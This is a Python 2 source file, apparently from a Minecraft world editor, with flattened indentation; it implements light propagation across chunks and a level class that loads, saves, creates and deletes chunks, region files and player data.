la = array(self.materials.lightAbsorption)
clip(la, 1, 15, la)
dirtyChunks = set(dirtyChunks)
workDone = 0
workTotal = len(dirtyChunks) * 29
progressInfo = (u"Lighting {0} chunks".format(len(dirtyChunks)))
info(progressInfo)
for i, chunk in enumerate(dirtyChunks):
try:
chunk.load();
except (ChunkNotPresent, ChunkMalformed):
continue;
chunk.chunkChanged();
yield i, workTotal, progressInfo
assert chunk.dirty and chunk.needsLighting
workDone += len(dirtyChunks)
workTotal = len(dirtyChunks)
for ch in list(dirtyChunks):
#relight all blocks in neighboring chunks in case their light source disappeared.
cx, cz = ch.chunkPosition
for dx, dz in itertools.product((-1, 0, 1), (-1, 0, 1)):
try:
ch = self.getChunk (cx + dx, cz + dz)
except (ChunkNotPresent, ChunkMalformed):
continue
dirtyChunks.add(ch);
dirtyChunks = sorted(dirtyChunks, key=lambda x:x.chunkPosition)
workTotal += len(dirtyChunks) * 28
for i, chunk in enumerate(dirtyChunks):
chunk.BlockLight[:] = self.materials.lightEmission[chunk.Blocks];
chunk.dirty = True
if conserveMemory:
chunk.compress();
zeroChunk = ZeroChunk(self.Height)
zeroChunk.BlockLight[:] = 0;
zeroChunk.SkyLight[:] = 0;
startingDirtyChunks = dirtyChunks
oldLeftEdge = zeros((1, 16, self.Height), 'uint8');
oldBottomEdge = zeros((16, 1, self.Height), 'uint8');
oldChunk = zeros((16, 16, self.Height), 'uint8');
if self.dimNo in (-1, 1):
lights = ("BlockLight",)
else:
lights = ("BlockLight", "SkyLight")
info(u"Dispersing light...")
def clipLight(light):
#light arrays are all uint8 by default, so when results go negative
#they become large instead. reinterpret as signed int using view()
#and then clip to range
light.view('int8').clip(0, 15, light)
for j, light in enumerate(lights):
zerochunkLight = getattr(zeroChunk, light);
newDirtyChunks = list(startingDirtyChunks);
work = 0
for i in range(14):
if len(newDirtyChunks) == 0:
workTotal -= len(startingDirtyChunks) * (14 - i)
break
progressInfo = u"{0} Pass {1}: {2} chunks".format(light, i, len(newDirtyChunks))
info(progressInfo)
"""
propagate light!
for each of the six cardinal directions, figure a new light value for
adjoining blocks by reducing this chunk's light by light absorption and fall off.
compare this new light value against the old light value and update with the maximum.
we calculate all chunks one step before moving to the next step, to ensure all gaps at chunk edges are filled.
we do an extra cycle because lights sent across edges may lag by one cycle.
xxx this can be optimized by finding the highest and lowest blocks
that changed after one pass, and only calculating changes for that
vertical slice on the next pass. newDirtyChunks would have to be a
list of (cPos, miny, maxy) tuples or a cPos : (miny, maxy) dict
"""
newDirtyChunks = set(newDirtyChunks)
newDirtyChunks.discard(zeroChunk)
dirtyChunks = sorted(newDirtyChunks, key=lambda x:x.chunkPosition)
newDirtyChunks = list();
for chunk in dirtyChunks:
(cx, cz) = chunk.chunkPosition
neighboringChunks = {};
try:
chunk.load();
except (ChunkNotPresent, ChunkMalformed), e:
print "Chunk error during relight, chunk skipped: ", e
continue;
for dir, dx, dz in ((FaceXDecreasing, -1, 0),
(FaceXIncreasing, 1, 0),
(FaceZDecreasing, 0, -1),
(FaceZIncreasing, 0, 1)):
try:
neighboringChunks[dir] = self.getChunk(cx + dx, cz + dz)
except (ChunkNotPresent, ChunkMalformed):
neighboringChunks[dir] = zeroChunk;
chunkLa = la[chunk.Blocks];
chunkLight = getattr(chunk, light);
oldChunk[:] = chunkLight[:]
### Spread light toward -X
nc = neighboringChunks[FaceXDecreasing]
ncLight = getattr(nc, light);
oldLeftEdge[:] = ncLight[15:16, :, 0:self.Height] #save the old left edge
#left edge
newlight = (chunkLight[0:1, :, :self.Height] - la[nc.Blocks[15:16, :, 0:self.Height]])
clipLight(newlight)
maximum(ncLight[15:16, :, 0:self.Height], newlight, ncLight[15:16, :, 0:self.Height])
#chunk body
newlight = (chunkLight[1:16, :, 0:self.Height] - chunkLa[0:15, :, 0:self.Height])
clipLight(newlight)
maximum(chunkLight[0:15, :, 0:self.Height], newlight, chunkLight[0:15, :, 0:self.Height])
#right edge
nc = neighboringChunks[FaceXIncreasing]
ncLight = getattr(nc, light);
newlight = ncLight[0:1, :, :self.Height] - chunkLa[15:16, :, 0:self.Height]
clipLight(newlight)
maximum(chunkLight[15:16, :, 0:self.Height], newlight, chunkLight[15:16, :, 0:self.Height])
### Spread light toward +X
#right edge
nc = neighboringChunks[FaceXIncreasing]
ncLight = getattr(nc, light);
newlight = (chunkLight[15:16, :, 0:self.Height] - la[nc.Blocks[0:1, :, 0:self.Height]])
clipLight(newlight)
maximum(ncLight[0:1, :, 0:self.Height], newlight, ncLight[0:1, :, 0:self.Height])
#chunk body
newlight = (chunkLight[0:15, :, 0:self.Height] - chunkLa[1:16, :, 0:self.Height])
clipLight(newlight)
maximum(chunkLight[1:16, :, 0:self.Height], newlight, chunkLight[1:16, :, 0:self.Height])
#left edge
nc = neighboringChunks[FaceXDecreasing]
ncLight = getattr(nc, light);
newlight = ncLight[15:16, :, :self.Height] - chunkLa[0:1, :, 0:self.Height]
clipLight(newlight)
maximum(chunkLight[0:1, :, 0:self.Height], newlight, chunkLight[0:1, :, 0:self.Height])
zerochunkLight[:] = 0; #zero the zero chunk after each direction
# so the lights it absorbed don't affect the next pass
#check if the left edge changed and dirty or compress the chunk appropriately
if (oldLeftEdge != ncLight[15:16, :, :self.Height]).any():
#chunk is dirty
newDirtyChunks.append(nc)
### Spread light toward -Z
#bottom edge
nc = neighboringChunks[FaceZDecreasing]
ncLight = getattr(nc, light);
oldBottomEdge[:] = ncLight[:, 15:16, :self.Height] # save the old bottom edge
newlight = (chunkLight[:, 0:1, :self.Height] - la[nc.Blocks[:, 15:16, :self.Height]])
clipLight(newlight)
maximum(ncLight[:, 15:16, :self.Height], newlight, ncLight[:, 15:16, :self.Height])
#chunk body
newlight = (chunkLight[:, 1:16, :self.Height] - chunkLa[:, 0:15, :self.Height])
clipLight(newlight)
maximum(chunkLight[:, 0:15, :self.Height], newlight, chunkLight[:, 0:15, :self.Height])
#top edge
nc = neighboringChunks[FaceZIncreasing]
ncLight = getattr(nc, light);
newlight = ncLight[:, 0:1, :self.Height] - chunkLa[:, 15:16, 0:self.Height]
clipLight(newlight)
maximum(chunkLight[:, 15:16, 0:self.Height], newlight, chunkLight[:, 15:16, 0:self.Height])
### Spread light toward +Z
#top edge
nc = neighboringChunks[FaceZIncreasing]
ncLight = getattr(nc, light);
newlight = (chunkLight[:, 15:16, :self.Height] - la[nc.Blocks[:, 0:1, :self.Height]])
clipLight(newlight)
maximum(ncLight[:, 0:1, :self.Height], newlight, ncLight[:, 0:1, :self.Height])
#chunk body
newlight = (chunkLight[:, 0:15, :self.Height] - chunkLa[:, 1:16, :self.Height])
clipLight(newlight)
maximum(chunkLight[:, 1:16, :self.Height], newlight, chunkLight[:, 1:16, :self.Height])
#bottom edge
nc = neighboringChunks[FaceZDecreasing]
ncLight = getattr(nc, light);
newlight = ncLight[:, 15:16, :self.Height] - chunkLa[:, 0:1, 0:self.Height]
clipLight(newlight)
maximum(chunkLight[:, 0:1, 0:self.Height], newlight, chunkLight[:, 0:1, 0:self.Height])
zerochunkLight[:] = 0;
if (oldBottomEdge != ncLight[:, 15:16, :self.Height]).any():
newDirtyChunks.append(nc)
newlight = (chunkLight[:, :, 0:self.Height - 1] - chunkLa[:, :, 1:self.Height])
clipLight(newlight)
maximum(chunkLight[:, :, 1:self.Height], newlight, chunkLight[:, :, 1:self.Height])
newlight = (chunkLight[:, :, 1:self.Height] - chunkLa[:, :, 0:self.Height - 1])
clipLight(newlight)
maximum(chunkLight[:, :, 0:self.Height - 1], newlight, chunkLight[:, :, 0:self.Height - 1])
if (oldChunk != chunkLight).any():
newDirtyChunks.append(chunk);
work += 1
yield workDone + work, workTotal, progressInfo
workDone += work
workTotal -= len(startingDirtyChunks)
workTotal += work
work = 0
for ch in startingDirtyChunks:
ch.needsLighting = False;
class MCInfdevOldLevel(ChunkedLevelMixin, EntityLevel):
materials = alphaMaterials;
isInfinite = True
parentWorld = None;
dimNo = 0;
Height = 128
@property
def displayName(self):
#shortname = os.path.basename(self.filename);
#if shortname == "level.dat":
shortname = os.path.basename(os.path.dirname(self.filename))
return shortname
@classmethod
def _isLevel(cls, filename):
join = os.path.join
exists = os.path.exists
if exists(join(filename, "chunks.dat")): return False # exclude Pocket Edition folders
if not os.path.isdir(filename):
f = os.path.basename(filename)
if f not in ("level.dat", "level.dat_old"): return False
filename = os.path.dirname(filename)
files = os.listdir(filename);
if "level.dat" in files or "level.dat_old" in files:
return True;
return False
def getWorldBounds(self):
if self.chunkCount == 0:
return BoundingBox((0, 0, 0), (0, 0, 0))
allChunksArray = array(list(self.allChunks), dtype='int32')
mincx = min(allChunksArray[:, 0])
maxcx = max(allChunksArray[:, 0])
mincz = min(allChunksArray[:, 1])
maxcz = max(allChunksArray[:, 1])
origin = (mincx << 4, 0, mincz << 4)
size = ((maxcx - mincx + 1) << 4, self.Height, (maxcz - mincz + 1) << 4)
return BoundingBox(origin, size)
def __str__(self):
return "MCInfdevOldLevel(\"" + os.path.split(self.worldDir)[1] + "\")"
def TagProperty(tagName, tagType, defaultValueFunc=lambda self:None):
def getter(self):
if tagName not in self.root_tag[Data]:
self.root_tag[Data][tagName] = tagType(defaultValueFunc(self))
return self.root_tag[Data][tagName].value
def setter(self, val):
self.root_tag[Data][tagName] = tagType(value=val)
return property(getter, setter)
SizeOnDisk = TagProperty('SizeOnDisk', TAG_Long)
RandomSeed = TagProperty('RandomSeed', TAG_Long)
Time = TagProperty('Time', TAG_Long); """ Age of the world in ticks. 20 ticks per second; 24000 ticks per day."""
LastPlayed = TagProperty('LastPlayed', TAG_Long, lambda self:long(time.time() * 1000))
LevelName = TagProperty('LevelName', TAG_String, lambda self:self.displayName)
MapFeatures = TagProperty('MapFeatures', TAG_Byte, lambda self:1)
GameType = TagProperty('GameType', TAG_Int, lambda self:0) #0 for survival, 1 for creative
GAMETYPE_SURVIVAL = 0
GAMETYPE_CREATIVE = 1
_bounds = None
@property
def bounds(self):
if self._bounds is None: self._bounds = self.getWorldBounds();
return self._bounds
@property
def size(self):
return self.bounds.size
def close(self):
for rf in (self.regionFiles or {}).values():
rf.close();
self.regionFiles = {}
self._allChunks = None
self._loadedChunks = {}
def create(self, filename, random_seed, last_played):
if filename == None:
raise ValueError, "Can't create an Infinite level without a filename!"
#create a new level
root_tag = TAG_Compound();
root_tag[Data] = TAG_Compound();
root_tag[Data][SpawnX] = TAG_Int(0)
root_tag[Data][SpawnY] = TAG_Int(2)
root_tag[Data][SpawnZ] = TAG_Int(0)
if last_played is None:
last_played = long(time.time() * 1000)
if random_seed is None:
random_seed = long(random.random() * 0xffffffffffffffffL) - 0x8000000000000000L
self.root_tag = root_tag;
root_tag[Data]['version'] = TAG_Int(19132)
self.LastPlayed = long(last_played)
self.RandomSeed = long(random_seed)
self.SizeOnDisk = 0
self.Time = 1
self.LevelName = os.path.basename(self.worldDir)
### if singleplayer:
self.createPlayer("Player")
if not os.path.exists(self.worldDir):
os.mkdir(self.worldDir)
def createPlayer(self, playerName):
if playerName == "Player":
playerTag = self.root_tag[Data].setdefault(playerName, TAG_Compound())
else:
playerTag = TAG_Compound()
playerTag['Air'] = TAG_Short(300);
playerTag['AttackTime'] = TAG_Short(0)
playerTag['DeathTime'] = TAG_Short(0);
playerTag['Fire'] = TAG_Short(-20);
playerTag['Health'] = TAG_Short(20);
playerTag['HurtTime'] = TAG_Short(0);
playerTag['Score'] = TAG_Int(0);
playerTag['FallDistance'] = TAG_Float(0)
playerTag['OnGround'] = TAG_Byte(0)
playerTag['Inventory'] = TAG_List()
playerTag['Motion'] = TAG_List([TAG_Double(0) for i in range(3)])
playerTag['Pos'] = TAG_List([TAG_Double([0.5, 2.8, 0.5][i]) for i in range(3)])
playerTag['Rotation'] = TAG_List([TAG_Float(0), TAG_Float(0)])
if playerName != "Player":
self.playerTagCache.save(self.getPlayerPath(playerName))
def __init__(self, filename=None, create=False, random_seed=None, last_played=None):
"""
Load an Alpha level from the given filename. It can point to either
a level.dat or a folder containing one. If create is True, it will
also create the world using the random_seed and last_played arguments.
If they are none, a random 64-bit seed will be selected for RandomSeed
and long(time.time()*1000) will be used for LastPlayed.
If you try to create an existing world, its level.dat will be replaced.
"""
self.Length = 0
self.Width = 0
self.Height = 128 #subject to change?
self.playerTagCache = {}
self.players = []
if not os.path.exists(filename):
if not create:
raise IOError, 'File not found'
self.worldDir = filename
os.mkdir(self.worldDir)
if os.path.isdir(filename):
self.worldDir = filename
else:
if os.path.basename(filename) in ("level.dat", "level.dat_old"):
self.worldDir = os.path.dirname(filename)
else:
raise IOError, 'File is not a Minecraft Alpha world'
self.filename = os.path.join(self.worldDir, "level.dat")
self.regionDir = os.path.join(self.worldDir, "region")
if not os.path.exists(self.regionDir):
os.mkdir(self.regionDir)
#maps (cx,cz) pairs to InfdevChunks
self._loadedChunks = {}
self._allChunks = None
self.dimensions = {};
self.regionFiles = {}
#used to limit memory usage
self.loadedChunkQueue = dequeset()
self.decompressedChunkQueue = dequeset()
self.loadLevelDat(create, random_seed, last_played);
#attempt to support yMod
try:
self.Height = self.root_tag["Data"]["YLimit"].value
except:
pass
self.playersDir = os.path.join(self.worldDir, "players");
if os.path.isdir(self.playersDir):
self.players = [x[:-4] for x in os.listdir(self.playersDir) if x.endswith(".dat")]
if "Player" in self.root_tag["Data"]:
self.players.append("Player")
self.preloadDimensions();
#self.preloadChunkPositions();
def __del__(self):
self.close()
def loadLevelDat(self, create=False, random_seed=None, last_played=None):
if create:
self.create(self.filename, random_seed, last_played);
self.saveInPlace();
else:
try:
self.root_tag = nbt.load(self.filename)
except Exception, e:
filename_old = os.path.join(self.worldDir, "level.dat_old")
info("Error loading level.dat, trying level.dat_old ({0})".format(e))
try:
self.root_tag = nbt.load(filename_old)
info("level.dat restored from backup.")
self.saveInPlace();
except Exception, e:
traceback.print_exc()
print repr(e)
info("Error loading level.dat_old. Initializing with defaults.");
self.create(self.filename, random_seed, last_played);
def preloadDimensions(self):
worldDirs = os.listdir(self.worldDir);
for dirname in worldDirs :
if dirname.startswith("DIM"):
try:
dimNo = int(dirname[3:]);
info("Found dimension {0}".format(dirname))
dim = MCAlphaDimension(self, dimNo);
self.dimensions[dimNo] = dim;
except Exception, e:
error(u"Error loading dimension {0}: {1}".format(dirname, e))
def getDimension(self, dimNo):
if self.dimNo != 0:
return self.parentWorld.getDimension(dimNo)
if dimNo == 0:
return self
if dimNo in self.dimensions: return self.dimensions[dimNo]
dim = MCAlphaDimension(self, dimNo, create=True)
self.dimensions[dimNo] = dim
return dim
def getRegionForChunk(self, cx, cz):
rx = cx >> 5
rz = cz >> 5
return self.getRegionFile(rx, rz)
def preloadChunkPositions(self):
if self.version == 19132:
self.preloadRegions()
else:
self.preloadChunkPaths()
def findRegionFiles(self):
regionDir = os.path.join(self.worldDir, "region")
if not os.path.exists(regionDir):
os.mkdir(regionDir)
regionFiles = os.listdir(regionDir)
for filename in regionFiles:
yield os.path.join(regionDir, filename)
def loadRegionFile(self, filepath):
filename = os.path.basename(filepath)
bits = filename.split('.')
if len(bits) < 4 or bits[0] != 'r' or bits[3] != "mcr": return None
try:
rx, rz = map(int, bits[1:3])
except ValueError:
return None
return MCRegionFile(filepath, (rx, rz))
def getRegionFile(self, rx, rz):
regionFile = self.regionFiles.get((rx, rz))
if regionFile: return regionFile
regionFile = MCRegionFile(self.regionFilename(rx, rz), (rx, rz))
self.regionFiles[rx, rz] = regionFile;
return regionFile
def unloadRegions(self):
self.close()
def preloadRegions(self):
info(u"Scanning for regions...")
self._allChunks = set()
for filepath in self.findRegionFiles():
regionFile = self.loadRegionFile(filepath)
if regionFile is None: continue
if regionFile.offsets.any():
rx, rz = regionFile.regionCoords
self.regionFiles[rx, rz] = regionFile
for index, offset in enumerate(regionFile.offsets):
if offset:
cx = index & 0x1f
cz = index >> 5
cx += rx << 5
cz += rz << 5
self._allChunks.add((cx, cz))
else:
info(u"Removing empty region file {0}".format(filepath))
regionFile.close()
os.unlink(regionFile.path)
def preloadChunkPaths(self):
info(u"Scanning for chunks...")
worldDirs = os.listdir(self.worldDir);
self._allChunks = set()
for dirname in worldDirs:
if(dirname in self.dirhashes):
subdirs = os.listdir(os.path.join(self.worldDir, dirname));
for subdirname in subdirs:
if(subdirname in self.dirhashes):
filenames = os.listdir(os.path.join(self.worldDir, dirname, subdirname));
#def fullname(filename):
#return os.path.join(self.worldDir, dirname, subdirname, filename);
#fullpaths = map(fullname, filenames);
bits = map(lambda x:x.split('.'), filenames);
chunkfilenames = filter(lambda x:(len(x) == 4 and x[0].lower() == 'c' and x[3].lower() == 'dat'), bits)
for c in chunkfilenames:
try:
cx, cz = (decbase36(c[1]), decbase36(c[2]))
except Exception, e:
info(u'Skipped file {0} ({1})'.format(u'.'.join(c), e))
continue
self._allChunks.add((cx, cz))
#
info(u"Found {0} chunks.".format(len(self._allChunks)))
def compress(self):
self.compressAllChunks();
def compressAllChunks(self):
for ch in self._loadedChunks.itervalues():
ch.compress();
def compressChunk(self, cx, cz):
if not (cx, cz) in self._loadedChunks: return; #not an error
self._loadedChunks[cx, cz].compress()
decompressedChunkLimit = 2048 # about 320 megabytes
loadedChunkLimit = 8192 # from 8mb to 800mb depending on chunk contents
def chunkDidCompress(self, chunk):
self.decompressedChunkQueue.discard(chunk)
def chunkDidDecompress(self, chunk):
if not chunk in self.decompressedChunkQueue:
self.decompressedChunkQueue.append(chunk);
if self.decompressedChunkLimit and (len(self.decompressedChunkQueue) > self.decompressedChunkLimit):
oldestChunk = self.decompressedChunkQueue[0];
oldestChunk.compress(); #calls chunkDidCompress
def chunkDidUnload(self, chunk):
self.loadedChunkQueue.discard(chunk)
def chunkDidLoad(self, chunk):
if chunk not in self.loadedChunkQueue:
self.loadedChunkQueue.append(chunk);
if self.loadedChunkLimit and (len(self.loadedChunkQueue) > self.loadedChunkLimit):
oldestChunk = self.loadedChunkQueue[0];
oldestChunk.unload(); #calls chunkDidUnload
@property
@decompress_first
def version(self):
if 'version' in self.root_tag['Data']:
return self.root_tag['Data']['version'].value
else:
return None
@version.setter
@decompress_first
def version(self, val):
if 'version' in self.root_tag['Data']:
self.root_tag['Data']['version'].value = val
@version.deleter
@decompress_first
def version(self):
self.root_tag['Data'].pop('version')
def _loadChunk(self, chunk):
""" load the chunk data from disk, and set the chunk's compressedTag
and root_tag"""
cx, cz = chunk.chunkPosition
try:
if self.version:
regionFile = self.getRegionForChunk(cx, cz)
regionFile.loadChunk(chunk)
else:
with file(chunk.filename, 'rb') as f:
cdata = f.read()
chunk.compressedTag = cdata
data = gunzip(cdata)
chunk.root_tag = nbt.load(buf=data)
except Exception, e:
raise ChunkMalformed, "Chunk {0} had an error: {1!r}".format(chunk.chunkPosition, e), sys.exc_info()[2]
def _saveChunk(self, chunk):
cx, cz = chunk.chunkPosition
if self.version:
regionFile = self.getRegionForChunk(cx, cz)
regionFile.saveChunk(chunk)
else:
dir1 = os.path.dirname(chunk.filename)
dir2 = os.path.dirname(dir1)
if not os.path.exists(dir2):
os.mkdir(dir2)
if not os.path.exists(dir1):
os.mkdir(dir1)
chunk.compress()
with file(chunk.filename, 'wb') as f:
f.write(chunk.compressedTag)
def discardAllChunks(self):
""" clear lots of memory, fast. """
def chunkFilenameAt(self, x, y, z):
cx = x >> 4
cz = z >> 4
return self._loadedChunks.get((cx, cz)).filename
def dirhash(self, n):
return self.dirhashes[n % 64];
def _dirhash(self):
n = self
n = n % 64;
s = u"";
if(n >= 36):
s += u"1";
n -= 36;
s += u"0123456789abcdefghijklmnopqrstuvwxyz"[n]
return s;
dirhashes = [_dirhash(n) for n in range(64)];
def regionFilename(self, rx, rz):
s = os.path.join(self.regionDir,
"r.%s.%s.mcr" % ((rx), (rz)));
return s;
def chunkFilename(self, x, z):
s = os.path.join(self.worldDir, self.dirhash(x), self.dirhash(z),
"c.%s.%s.dat" % (base36(x), base36(z)));
return s;
def extractChunksInBox(self, box, parentFolder):
for cx, cz in box.chunkPositions:
if self.containsChunk(cx, cz):
self.extractChunk(cx, cz, parentFolder)
def extractChunk(self, cx, cz, parentFolder):
if not os.path.exists(parentFolder):
os.mkdir(parentFolder)
chunkFilename = self.chunkFilename(cx, cz)
outputFile = os.path.join(parentFolder, os.path.basename(chunkFilename))
chunk = self.getChunk(cx, cz)
if chunk.compressMode == MCRegionFile.VERSION_GZIP:
chunk.compress()
data = chunk.compressedTag;
else:
chunk.decompress()
chunk.packChunkData()
data = chunk.compressTagGzip(chunk.root_tag)
with file(outputFile, "wb") as f:
f.write(data)
def heightMapAt(self, x, z):
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
ch = self.getChunk(xc, zc)
heightMap = ch.HeightMap
return heightMap[zInChunk, xInChunk];
#the heightmap is ordered differently because in minecraft it is a flat array
@property
def loadedChunks(self):
return self._loadedChunks.keys();
@property
def chunkCount(self):
"""Returns the number of chunks in the level. May initiate a costly
chunk scan."""
if self._allChunks is None:
self.preloadChunkPositions()
return len(self._allChunks)
@property
def allChunks(self):
"""Iterates over (xPos, zPos) tuples, one for each chunk in the level.
May initiate a costly chunk scan."""
if self._allChunks is None:
self.preloadChunkPositions()
return self._allChunks.__iter__();
def _getChunkUnloaded(self, cx, cz):
"""return the InfdevChunk object at the given position. because loading
the chunk is done later, accesses to chunk attributes may
raise ChunkMalformed"""
if not self.containsChunk(cx, cz) :
raise ChunkNotPresent, (cx, cz);
if not (cx, cz) in self._loadedChunks:
self._loadedChunks[cx, cz] = InfdevChunk(self, (cx, cz));
return self._loadedChunks[cx, cz]
def chunkIsLoaded(self, cx, cz):
if (cx, cz) in self._loadedChunks:
return self._loadedChunks[(cx, cz)].isLoaded()
return False
def chunkIsCompressed(self, cx, cz):
if (cx, cz) in self._loadedChunks:
return self._loadedChunks[(cx, cz)].isCompressed()
return False
def chunkIsDirty(self, cx, cz):
if (cx, cz) in self._loadedChunks:
return self._loadedChunks[(cx, cz)].dirty
return False
def getChunk(self, cx, cz):
""" read the chunk from disk, load it, and return it.
decompression and unpacking is done lazily."""
c = self._getChunkUnloaded(cx, cz)
c.load();
if not (cx, cz) in self._loadedChunks:
raise ChunkMalformed, "Chunk {0} malformed".format((cx, cz))
self.world.malformedChunk(*self.chunkPosition);
return c;
def markDirtyChunk(self, cx, cz):
if not (cx, cz) in self._loadedChunks: return
self._loadedChunks[cx, cz].chunkChanged();
def markDirtyBox(self, box):
for cx, cz in box.chunkPositions:
self.markDirtyChunk(cx, cz)
def saveInPlace(self):
for level in self.dimensions.itervalues():
level.saveInPlace(True);
dirtyChunkCount = 0;
if self._loadedChunks:
for chunk in self._loadedChunks.itervalues():
if chunk.dirty:
dirtyChunkCount += 1;
chunk.save();
for path, tag in self.playerTagCache.iteritems():
tag.saveGzipped(path)
self.playerTagCache = {}
self.root_tag.save(self.filename);
info(u"Saved {0} chunks".format(dirtyChunkCount))
def addEntity(self, entityTag):
assert isinstance(entityTag, TAG_Compound)
x, y, z = map(lambda x:int(floor(x)), Entity.pos(entityTag))
try:
chunk = self.getChunk(x >> 4, z >> 4)
except (ChunkNotPresent, ChunkMalformed), e:
return None
# raise Error, can't find a chunk?
chunk.addEntity(entityTag);
chunk.dirty = True
def tileEntityAt(self, x, y, z):
chunk = self.getChunk(x >> 4, z >> 4)
return chunk.tileEntityAt(x, y, z)
def addTileEntity(self, tileEntityTag):
assert isinstance(tileEntityTag, TAG_Compound)
if not 'x' in tileEntityTag: return
x, y, z = TileEntity.pos(tileEntityTag)
try:
chunk = self.getChunk(x >> 4, z >> 4)
except (ChunkNotPresent, ChunkMalformed):
return
# raise Error, can't find a chunk?
chunk.addTileEntity(tileEntityTag)
chunk.dirty = True
def getEntitiesInBox(self, box):
entities = []
for chunk, slices, point in self.getChunkSlices(box):
entities += chunk.getEntitiesInBox(box)
return entities
def removeEntitiesInBox(self, box):
count = 0;
for chunk, slices, point in self.getChunkSlices(box):
count += chunk.removeEntitiesInBox(box);
info("Removed {0} entities".format(count))
return count;
def removeTileEntitiesInBox(self, box):
count = 0;
for chunk, slices, point in self.getChunkSlices(box):
count += chunk.removeTileEntitiesInBox(box);
info("Removed {0} tile entities".format(count))
return count;
def containsPoint(self, x, y, z):
if y < 0 or y > 127: return False;
return self.containsChunk(x >> 4, z >> 4)
def containsChunk(self, cx, cz):
if self._allChunks is not None: return (cx, cz) in self._allChunks;
if (cx, cz) in self._loadedChunks: return True;
if self.version:
rx, rz = cx>>5, cz>>5
if not os.path.exists(self.regionFilename(rx, rz)): return False
return self.getRegionFile(rx,rz).containsChunk(cx, cz)
else:
return os.path.exists(self.chunkFilename(cx, cz))
def malformedChunk(self, cx, cz):
debug(u"Forgetting malformed chunk {0} ({1})".format((cx, cz), self.chunkFilename(cx, cz)))
if (cx, cz) in self._loadedChunks:
del self._loadedChunks[(cx, cz)]
self._bounds = None
def createChunk(self, cx, cz):
if self.containsChunk(cx, cz): raise ValueError, "{0}:Chunk {1} already present!".format(self, (cx, cz))
if self._allChunks is not None:
self._allChunks.add((cx, cz))
self._loadedChunks[cx, cz] = InfdevChunk(self, (cx, cz), create=True)
self._bounds = None
def createChunks(self, chunks):
i = 0;
ret = [];
for cx, cz in chunks:
i += 1;
if not self.containsChunk(cx, cz):
ret.append((cx, cz))
self.createChunk(cx, cz);
self.compressChunk(cx, cz);
assert self.containsChunk(cx, cz), "Just created {0} but it didn't take".format((cx, cz))
if i % 100 == 0:
info(u"Chunk {0}...".format(i))
info("Created {0} chunks.".format(len(ret)))
return ret;
def createChunksInBox(self, box):
info(u"Creating {0} chunks in {1}".format((box.maxcx - box.mincx) * (box.maxcz - box.mincz), ((box.mincx, box.mincz), (box.maxcx, box.maxcz))))
return self.createChunks(box.chunkPositions);
def deleteChunk(self, cx, cz):
if self._allChunks is not None: self._allChunks.discard((cx, cz))
if (cx, cz) in self._loadedChunks:
del self._loadedChunks[(cx, cz)]
if self.version:
r = cx >> 5, cz >> 5
rf = self.getRegionFile(*r)
if rf:
rf.setOffset(cx & 0x1f , cz & 0x1f, 0)
if (rf.offsets == 0).all():
rf.close()
os.unlink(rf.path)
del self.regionFiles[r]
else:
os.unlink(self.chunkFilename(cx, cz))
self._bounds = None
def deleteChunksInBox(self, box):
info(u"Deleting {0} chunks in {1}".format((box.maxcx - box.mincx) * (box.maxcz - box.mincz), ((box.mincx, box.mincz), (box.maxcx, box.maxcz))))
i = 0;
ret = [];
for cx, cz in itertools.product(xrange(box.mincx, box.maxcx), xrange(box.mincz, box.maxcz)):
i += 1;
if self.containsChunk(cx, cz):
self.deleteChunk(cx, cz);
ret.append((cx, cz))
assert not self.containsChunk(cx, cz), "Just deleted {0} but it didn't take".format((cx, cz))
if i % 100 == 0:
info(u"Chunk {0}...".format(i))
return ret
spawnxyz = ["SpawnX", "SpawnY", "SpawnZ"]
def playerSpawnPosition(self, player=None):
"""
xxx if player is None then it gets the default spawn position for the world
if player hasn't used a bed then it gets the default spawn position
"""
dataTag = self.root_tag["Data"]
if player is None:
playerSpawnTag = dataTag
else:
playerSpawnTag = self.getPlayerTag(player)
return [playerSpawnTag.get(i, dataTag[i]).value for i in self.spawnxyz]
def setPlayerSpawnPosition(self, pos, player=None):
""" xxx if player is None then it sets the default spawn position for the world """
if player is None:
playerSpawnTag = self.root_tag["Data"]
else:
playerSpawnTag = self.getPlayerTag(player)
for name, val in zip(self.spawnxyz, pos):
playerSpawnTag[name] = nbt.TAG_Int(val);
def getPlayerPath(self, player):
assert player != "Player"
return os.path.join(self.playersDir, player + ".dat")
def getPlayerTag(self, player="Player"):
if player == "Player":
if player in self.root_tag["Data"]:
#single-player world
return self.root_tag["Data"]["Player"];
raise PlayerNotFound, player
else:
playerFilePath = self.getPlayerPath(player)
if os.path.exists(playerFilePath):
#multiplayer world, found this player
playerTag = self.playerTagCache.get(playerFilePath)
if playerTag is None:
playerTag = nbt.load(playerFilePath)
self.playerTagCache[playerFilePath] = playerTag
return playerTag
else:
raise PlayerNotFound, "{0}".format(player)
#return None
def getPlayerDimension(self, player="Player"):
playerTag = self.getPlayerTag(player)
if "Dimension" not in playerTag: return 0;
return playerTag["Dimension"].value
def setPlayerDimension(self, d, player="Player"):
playerTag = self.getPlayerTag(player)
if "Dimension" not in playerTag: playerTag["Dimension"] = nbt.TAG_Int(0);
playerTag["Dimension"].value = d;
def setPlayerPosition(self, pos, player="Player"):
posList = nbt.TAG_List([nbt.TAG_Double(p) for p in pos]);
playerTag = self.getPlayerTag(player)
playerTag["Pos"] = posList
def getPlayerPosition(self, player="Player"):
playerTag = self.getPlayerTag(player)
posList = playerTag["Pos"];
pos = map(lambda x:x.value, posList);
return pos;
def setPlayerOrientation(self, yp, player="Player"):
self.getPlayerTag(player)["Rotation"] = nbt.TAG_List([nbt.TAG_Float(p) for p in yp])
def getPlayerOrientation(self, player="Player"):
""" returns (yaw, pitch) """
yp = map(lambda x:x.value, self.getPlayerTag(player)["Rotation"]);
y, p = yp;
if p == 0: p = 0.000000001;
if p == 180.0: p -= 0.000000001;
yp = y, p;
return array(yp);
def setPlayerAbilities(self, gametype, player="Player"):
playerTag = self.getPlayerTag(player)
# Check for the Abilities tag. It will be missing in worlds from before
# Beta 1.9 Prerelease 5.
if not 'abilities' in playerTag:
playerTag['abilities'] = TAG_Compound()
# Assumes creative (1) is the only mode with these abilities set,
# which is true for now. Future game modes may not hold this to be
# true, however.
if gametype == 1:
playerTag['abilities']['instabuild'] = TAG_Byte(1)
playerTag['abilities']['mayfly'] = TAG_Byte(1)
playerTag['abilities']['invulnerable'] = TAG_Byte(1)
else:
playerTag['abilities']['flying'] = TAG_Byte(0)
playerTag['abilities']['instabuild'] = TAG_Byte(0)
playerTag['abilities']['mayfly'] = TAG_Byte(0)
